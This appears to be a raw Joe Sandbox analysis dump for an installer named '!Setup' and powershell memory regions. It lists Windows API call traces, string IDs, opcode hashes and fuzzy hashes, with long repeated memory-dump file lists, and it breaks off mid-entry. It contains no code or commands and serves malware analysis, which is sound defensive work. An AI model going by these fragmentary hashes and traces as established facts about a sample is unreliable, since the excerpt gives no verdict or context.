                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcatwsprintf
                                                                                • String ID: %02x%c$...
                                                                                • API String ID: 3065427908-1057055748
                                                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                • API String ID: 2266616436-4211696005
                                                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                • String ID:
                                                                                • API String ID: 1599320355-0
                                                                                • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                APIs
                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                • String ID: Version
                                                                                • API String ID: 512980652-315105994
                                                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                • String ID:
                                                                                • API String ID: 2102729457-0
                                                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                • String ID:
                                                                                • API String ID: 2883127279-0
                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                APIs
                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                • String ID: !N~
                                                                                • API String ID: 623250636-529124213
                                                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405C74
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                • API String ID: 3509786178-2769509956
                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_4000000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0ddf9b6179f0caf2ae39f59a4e07c2a6f753b4dda964a39d68da0778a375e463
                                                                                • Instruction ID: 10092c26f6be551b664a0e9bf9b071fe75797faf5f246e5a45f0dde637796f3f
                                                                                • Opcode Fuzzy Hash: 0ddf9b6179f0caf2ae39f59a4e07c2a6f753b4dda964a39d68da0778a375e463
                                                                                • Instruction Fuzzy Hash: 5122BC70A042458FCB05CF5DC8949AABBB1FF49310B2585AAE545EB3A6C735FC81CBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_4000000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c0207dbb7778321320b91f2c66f4022a53c45ee565d2ea3f2c7529adee965c4f
                                                                                • Instruction ID: e299419f2e3a09a849e71bf5cf8aa59f3c656e2f7a915d6d5b3e42afed8c7078
                                                                                • Opcode Fuzzy Hash: c0207dbb7778321320b91f2c66f4022a53c45ee565d2ea3f2c7529adee965c4f
                                                                                • Instruction Fuzzy Hash: 5B219DB4A0120A8FCB01CF5CD8959AEFBB4FF49310B14859AE815EB392D735ED41CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_4000000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 529ae452a922da1e702f8fa79fc6000a5640d4c82d3dc8068ec69cd7aa934932
                                                                                • Instruction ID: 31be1ca170a7a8f793f5320a21ddd27ef962101d40a687b0695b0b9063390331
                                                                                • Opcode Fuzzy Hash: 529ae452a922da1e702f8fa79fc6000a5640d4c82d3dc8068ec69cd7aa934932
                                                                                • Instruction Fuzzy Hash: D7211774A012098FCB01CF9CD4909AEBBF5FF89310B15859AE809AB356C735FD41CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2437014690.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_71d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87edb885e6a4b9a0ac1229b2400995f1506cf42187ef0f18afdb52774d6738ce
                                                                                • Instruction ID: e938f5012ffdc5f9a10f1b810d1d65d1dba6a77c1a65712e24db9f76828e79f6
                                                                                • Opcode Fuzzy Hash: 87edb885e6a4b9a0ac1229b2400995f1506cf42187ef0f18afdb52774d6738ce
                                                                                • Instruction Fuzzy Hash: 2301A7715093449AE7204A2DC9847A7BFD8EF49324F18C529ED484A1C6C67D9CC1CEB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd
                                                                                Similarity
